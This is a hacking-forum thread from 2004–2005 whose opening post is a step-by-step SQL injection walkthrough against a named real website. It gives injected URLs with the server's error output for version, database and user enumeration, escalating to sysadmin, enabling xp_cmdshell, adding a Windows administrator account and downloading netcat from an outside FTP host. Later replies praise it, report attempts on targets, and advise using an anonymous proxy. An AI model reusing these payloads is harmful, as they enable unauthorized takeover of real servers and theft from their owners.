|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
DO u think u know everything about sql injection heh? |
|
Posted: Mon Dec 27, 2004 6:53 pm |
|
|
r0ot |
Regular user |
|
|
Joined: Jul 18, 2004 |
Posts: 15 |
|
|
|
|
|
|
|
Sorry i was missing almost a year from here.. but im back..
SQL INJECTION GATHERED FROM MASTERVN
REVISION 0.1
RELEASE A
EXAMPLE TO USE:
http://www.nhaxinh.com.vn/FullStory.asp?id=1
Exploiting the hole:
http://www.nhaxinh.com.vn/FullStory.asp?id=1'
Code: |
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBCSQLServerDriver] [SQLServer]
Unclosed quotation mark before the character string ''.
/Including/general.asp, line 840\ |
VERSION
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)--
Code: |
[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright ? 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/Including/general.asp, line 840
|
SERVER NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)--
Code: |
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int.
/Including/general.asp, line 840
|
DATABASE NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())--
Code: |
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int.
/Including/general.asp, line 840
|
USER
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,system_user)--
Code: |
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int.
/Including/general.asp, line 840
|
OPENING REMOTE LINK (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_oa-oz_78z8.asp)
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Code: |
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server.
/Including/general.asp, line 840
|
GUEST = DB_OWNER :DDD
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'--
Code: |
No result expected, normal page loading
Enable us to do sum nice stuff like xp_regwrite e xp_cmdshell
|
ADDIN TO "BUILTIN\ADMINISTRATORS"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'--
and then
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..sp_addsrvrolemember 'nhaxinh',sysadmin --
ENABLE OPENROWSET/OLEDB
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Code: |
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
/Including/general.asp, line 840
|
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'
ENABLE MASTER..XP_CMDSHELL & "ALLOW UPDATES"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')
!!PAY ATTETION TO THE SERVER= PARAMETER
Code: |
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
/Including/general.asp, line 840
|
if dun work try:
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--
NOW SCRIPT KIDDIES
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == ?%?)
Code: |
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840
C:\> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)):
203.162.7.70 == panvietnam.com
|
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == "&")
Code: |
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service
(Version 5.0).
User (203.162.7.70:(none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye
|
UPLOAD NETCAT L?N
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == ">")
Code: |
echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f
|
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))--
Code: |
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840
|
Enjoy and happy sql injection guys |
|
_________________
|
|
|
|
|
|
|
|
Posted: Mon Dec 27, 2004 9:18 pm |
|
|
Postal |
Regular user |
|
|
Joined: Dec 24, 2004 |
Posts: 5 |
Location: Latvija |
|
|
|
|
|
|
Nice to see you back!
And thanks for this |
|
_________________ Born to learn!!! |
|
|
|
Posted: Mon Dec 27, 2004 10:43 pm |
|
|
any2000 |
Active user |
|
|
Joined: Dec 02, 2004 |
Posts: 26 |
|
|
|
|
|
|
|
very very thanks for this |
|
|
|
|
Posted: Mon Dec 27, 2004 11:44 pm |
|
|
r0ot |
Regular user |
|
|
Joined: Jul 18, 2004 |
Posts: 15 |
|
|
|
|
|
|
|
heheh its nice to come back again.. i spent hole year studing a lot and more important improving my sql admin / dev skills, as you can see above i got much to learn... :/ duh
Comments bout the code, variations of it, etc are appreciated.
Regards |
|
_________________
|
|
|
|
Posted: Wed Dec 29, 2004 5:15 pm |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
Hi!, a very good job, I were trying it but i get this error when I execute the last injections
Code: |
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'BUILTIN\Administrators'.
|
Somebody know why coould this be?? |
|
|
|
|
Posted: Thu Dec 30, 2004 11:51 am |
|
|
r0ot |
Regular user |
|
|
Joined: Jul 18, 2004 |
Posts: 15 |
|
|
|
|
|
|
|
sum of the begginning queries dun worked out, so u couldnt add a user to the users... :/ bad..try to review the queries and re-exec it, remember always try to use a good anom proxy |
|
_________________
|
|
|
|
Posted: Sun Feb 13, 2005 11:05 am |
|
|
dairy123 |
Beginner |
|
|
Joined: Feb 13, 2005 |
Posts: 4 |
|
|
|
|
|
|
|
that was an extremely cool tut - so much thanks r00t.
just in time as i was losing sleep tryin to figure out which sys tables, sps and xps to use you saved my so many nights !!
looks like i am getting the same message
Login failed for user 'BUILTIN\Administrators'.
the sql admin seems to be a bit knowledgable - disabled select on the password column of sysxlogins
any thoughts i can elevate the user's privileges?
thnx much |
|
|
|
|
Posted: Tue Nov 01, 2005 7:13 am |
|
|
linzi |
Beginner |
|
|
Joined: Nov 01, 2005 |
Posts: 4 |
|
|
|
|
|
|
|
very good,i hv learn more sql injection skill from urs |
|
|
|
|
Posted: Thu Dec 08, 2005 11:46 am |
|
|
goblin |
Regular user |
|
|
Joined: Nov 03, 2005 |
Posts: 8 |
|
|
|
|
|
|
|
thx, you have a job! i am learning it now .so if someone want to injection like that ,you must master odbc |
|
|
|
|
|
Re: DO u think u know everything about sql injection heh? |
|
Posted: Thu Dec 08, 2005 11:47 am |
|
|
goblin |
Regular user |
|
|
Joined: Nov 03, 2005 |
Posts: 8 |
|
|
|
|
|
|
|
thx, you have a job! i am learning it now .so if someone want to injection like that ,you must master odbc |
|
|
|
|
Posted: Tue Dec 20, 2005 9:22 pm |
|
|
vcore |
Regular user |
|
|
Joined: Jun 28, 2005 |
Posts: 13 |
|
|
|
|
|
|
|
Thank you. Two questions:
What's the diference beetwen AND and &
and When i put 1 and 1=convert(int,@@version)-- i have a "type mismatch"
(generally Cint), how should I fix this
Sorry for my englisg |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|